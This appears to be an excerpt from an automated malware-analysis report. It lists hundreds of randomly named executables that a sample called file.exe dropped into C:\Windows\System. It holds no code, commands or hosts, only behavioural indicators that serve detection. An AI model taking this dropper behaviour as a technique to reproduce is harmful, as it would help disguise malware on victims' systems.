Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ukkpYme.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hEUEsIC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mWAGJFM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cLSDHvv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\Csmwgyb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uHZGZjz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jzfTIlb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sOpjlAo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fWWVlTg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PZXDYlu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DTREvJC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HeXCeXe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BtXtEfY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sOGcIfs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SNcreuq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tRGqWXW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iIwdGAS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RlLCkUy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\caYiRYR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\otCfESI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MLxwqET.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xNhRSWh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZTSJHKb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YUQTINM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fEOJwwW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ppfNNTX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PABSWXd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MCvhdFU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fYMwhpS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ASKjfZy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PUqZmPS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NzANgdB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hhEeZzN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hAOVVjq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vREuzRr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eLYbCEG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MgoHIfZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sFwDWFc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jqUGnrw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\usscfzm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rXBWFEL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wJNkgSa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZDeifCM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mEVTdIJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XqXHiyf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ajEytdP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PRQFErV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\blOLvcj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JGfFPYZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mZnsuql.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DrKJjXc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JRnaUrS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IBWzTMA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iSmvfWm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bJVoOik.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VExclqz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mtnXczE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uwKMlqy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gQbnwXn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tXVZMjj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SYLAfii.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uBSPQKP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wWwDsEl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\brplcms.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tyQdqmC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\zJwJxgA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RKUSbZV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jkErNHB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rwUXwnj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gAPrxpM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\GaSDvNs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\zYyqoWF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iJpJhmt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PdxLXDE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LYzOvkf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uNQcZEb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ERbKWDm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\zzbooXY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QWtCxan.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ltlcnHD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tzOEnrH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FaabrKu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SOFlTuM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RtRmRJz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SxjZpBy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LPMtFlZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pPLiGBV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dmPtXnK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QZBRXHU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ssUJwoR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ndpwHPZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lQcYvMS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VPuwqFY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ihDRfqA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sctmwAr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uJEYoyF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\defQfgC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XJEUdeq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rKZvlov.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VWrcuzM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KVTiBjz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sPniyBl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wsmNUVo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lrIaMFU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LKurWpq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HUohYxb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MwFvbxc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\StIsyPE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WOvgLKK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xsirwHn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ffPPQcz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cVJdttA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VLekFWd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CpMhLMx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FGUHzJz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NuxBytj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gXwIlxx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HNocQDn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ftWkAMN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nJFWveO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rfpCYxf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xZqqKxJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UiAsnNy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HEPcUok.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fXSZuyj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ArNQyZf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hAjIjRa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rDRaLhy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UyqOZIb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rTrjeti.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AONeoTK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RgcKJVt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gPTriDK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bymvMyH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XBXKJRi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\osHoaGO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eQlnkhq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LNyWtrn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZlvPlxy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xVIixqx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JCZRmvQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sHbEZkY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rVmcjTa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aIuDozC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DtVOaSb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RCVCpIi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vyHGCnK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IEswIyo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IjDqKMU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iEDLgeS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\qmcblFN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZCyEzte.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ztQluWW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vixYnHG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PPOtBBY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZohDODH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tyXEsEa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FUwHkXo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AbenojY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mlhNNPN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pMaKiZu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BMxbfij.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OVdNTki.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NVxCwjX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FHjAcHx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\glgdLrR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jtnQpnb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pbwrbNh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HbWODob.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WVsCsMZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FgBtrMU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TBNKhIN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TQUlNhY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\izzcVgF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mbSqRHL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lyMiIxb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\veVfAiw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HVhldsH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZPBkGsL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZXNyiNu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sGYPztO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eIXgzbs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FGSooXz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yzVBTwc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\chBMsUn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EDndQMl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uxMRJKa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OyxgWny.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fhxlOMT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bxBimDh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mPNsbfH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WZkiNdG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nkFLDPI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yolnOnG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SUucMiy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aFpkhGM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AOSuUmd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DNhkeWm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\svRRwoZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nKUJunm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HuKkgJY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mBbgLGb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DCqXTox.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PbUiiSM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VsobEcA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CVYvaQs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KeLPRxW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tWOQBIk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mshbGSl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ccbrmxM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sJZigTD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WvowvSL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BnLcQMe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wkazDeV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mdMaqgD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rTpsbWr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cBoEBlV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NqPZXyD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dbgHMyC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cyvijMt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ykZgpGK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UqXZtcb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YIjJOqk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JqFVNbS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wNVvJxX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\oCLXTVT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dPvMBBP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WCbcoxD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CoTJSDT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wnWUbPS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZFvVqBc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VjXLpYb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lVudyTV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WdIXuil.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DBfMBcY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iYYYydA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XbARtow.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vKoIcLB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xAngvPh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wPprRzW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xyokMuX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ckHJCFb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\imwRXsl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\kPkYoOt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FlmGZHf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pnGqAlS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HHsWpNX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LFQLRaY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ghXRScL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VHwkuIa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HjdahEF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pMMnfcQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aFbtfKK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hzIYZSD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QqSzknx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LTWTGcY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LLELsGo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eIthybV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LCScugy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eaXsKmO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UQPgIol.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NrRaZIJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DTVvNoy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lBrohsB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hyzwXgh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sdTevgk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\skgGGJN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nJZyUBH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ucDGEkw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AXEGSHs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JdmbeCb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hMvDOJd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nWSykjl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pGmaKvE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EENzfBP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QrBMIBp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NDapyRM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CGpcHNw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pBTelAj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\GoSpvOG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bsgTRXG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tJmWuwF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jmSIZKC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OgBLDNx.exe	Jump to dropped file
